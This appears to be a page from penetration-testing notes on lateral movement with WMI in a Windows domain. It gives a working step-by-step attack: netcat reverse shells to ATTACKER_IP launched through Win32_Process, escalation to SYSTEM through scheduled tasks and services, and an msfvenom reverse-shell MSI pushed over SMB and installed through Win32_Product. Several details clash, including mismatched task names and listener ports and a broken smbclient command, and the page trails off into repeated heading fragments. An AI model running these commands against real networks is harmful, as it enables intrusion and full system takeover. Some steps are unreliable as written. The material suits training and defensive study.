Example

Refer to the section labelled "Example scenario" to understand the setup we will be working with. The following will illustrate an example of how we can use WMI to move laterally in a network.

(1) Using `Win_32_Process`

It appears that this method does not directly provide us with a shell session as the privileged nt authority\system user immediately. We need to perform certain privilege escalation steps (with the administrator credentials) to gain a privileged shell.

For the sake of simplicity, we will assume that the machine has the netcat binary installed in C:\tools\nc64.exe.

1. Start a listener on the attacker machine

$ nc -lvnp 9999

Take note of the port number used in this step

2. Create a new WMI session against our target machine (`iis.test.com`) and invoke the Create method from the `Win32_Process` class:

This step should be performed from an "intermediary" machine in the network that we have compromised (jmp.test.com)

a. Create WMI session:

PS C:\> $username = 'admin';
PS C:\> $password = 'pass';
PS C:\> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
PS C:\> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

PS C:\> $Opt = New-CimSessionOption -Protocol Dcom
PS C:\> $Session = New-CimSession -ComputerName iis.test.com -Credential $credential -SessionOption $Opt -ErrorAction Stop

b. Invoke Win32_Process Create method:

PS> $Command = "c:\tools\nc64.exe ATTACKER_IP 9999 -e cmd.exe"

PS> Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{ 
CommandLine = $Command 
}

Now, we should retrieve a remote shell on the listener we established previously:

Note that we have obtained a shell as the admin user, but not the highest privileged system user yet

C:\> whoami
admin

3. Escalate privilege to the highest privileged system user (`SYSTEM`):

3.1 Using `schtasks`

a. Start a listener on the attacker machine (on a separate port from the previously used one):

$ nc -lvnp 6666

b. Create and start a new task as the SYSTEM user:

C:\> schtasks /ru "SYSTEM" /create /tn "rooty" /tr "c:\tools\nc64.exe ATTACKER_IP 6666" /ru "SYSTEM" flag

C:\> schtasks /tn "privsec" /run

Now, we should receive a shell as the SYSTEM user:

C:\> whoami
nt authority\system

3.2 Using `sc.exe`

a. Start a listener on the attacker machine:

$ nc -lvnp 6666

b. Create and start a new service

C:\> sc.exe create "rooty" binPath= "c:\tools\nc64.exe ATTACKER_IP 6666" start= auto

C:\> sc.exe start "rooty"

Now, we should receive a shell as the SYSTEM user:

C:\> whoami
nt authority\system

(2) Using `.msi` packages and `Win32_Product`

1. Craft the reverse shell payload (`msfvenom`) in the `.msi` format

Attacker

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=8888 -f msi -o rvshell.msi

Take note of the value passed to the LPORT option

2. Copy the payload over to the target machine using SMB (or any other methods available):

Attacker

# lets first identify the name of the admin share
$ smbclient -U admin -W test.com -L '//iis.test.com'
Sharename       Type      Comment
---------       ----      -------
 ADMIN$         Disk      Remote Admin
...


$ smbclient -c "put <msi_name>.msi -U admin -W test.com '//iis.test.com/ADMIN$'

Replace service_exec_name>.exe with the name of the .msi file created with msfvenom

Start the msfconsole listener (used to catch the shell in one of the later step):

Attacker

$ msfconsole
msf6> use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST <local_addr>
msf6 exploit(multi/handler) > set LPORT 9999
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf6 exploit(multi/handler) > run

3. Create a new WMI session against our target machine (`iis.test.com`) and invoke the Install method from the `Win32_Product` class:

This step should be performed from an "intermediary" machine in the network that we have compromised (jmp.test.com)

a. Create WMI session

Follow the steps as shown in "part (1) Using Win32_Process " above.

b. Invoke Win32_Product Install method:

PS> Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{
PackageLocation = "C:\Windows\<installed_msi>.msi";
Options = "";
AllUsers = $false
}

After executing the above commands, we should receive a connection on the msfconsole listener we have established earlier:

msfconsole

C:\> whoami
nt authority\system

PreviousWindows Management Instrumentation (WMI)NextLeveraging alternate authentication materials

Last updated 3 months ago

(1) Using Win_32_Process

1. Start a listener on the attacker machine

2. Create a new WMI session against our target machine (iis.test.com) and invoke the Create method from the Win32_Process class:

3. Escalate privilege to the highest privileged system user (SYSTEM):

3.1 Using schtasks

3.2 Using sc.exe

(2) Using .msi packages and Win32_Product

1. Craft the reverse shell payload (msfvenom) in the .msi format

2. Copy the payload over to the target machine using SMB (or any other methods available):

3. Create a new WMI session against our target machine (iis.test.com) and invoke the Install method from the Win32_Product class:

(1) Using `Win_32_Process`

2. Create a new WMI session against our target machine (`iis.test.com`) and invoke the Create method from the `Win32_Process` class:

3. Escalate privilege to the highest privileged system user (`SYSTEM`):

3.1 Using `schtasks`

3.2 Using `sc.exe`

(2) Using `.msi` packages and `Win32_Product`

1. Craft the reverse shell payload (`msfvenom`) in the `.msi` format

3. Create a new WMI session against our target machine (`iis.test.com`) and invoke the Install method from the `Win32_Product` class: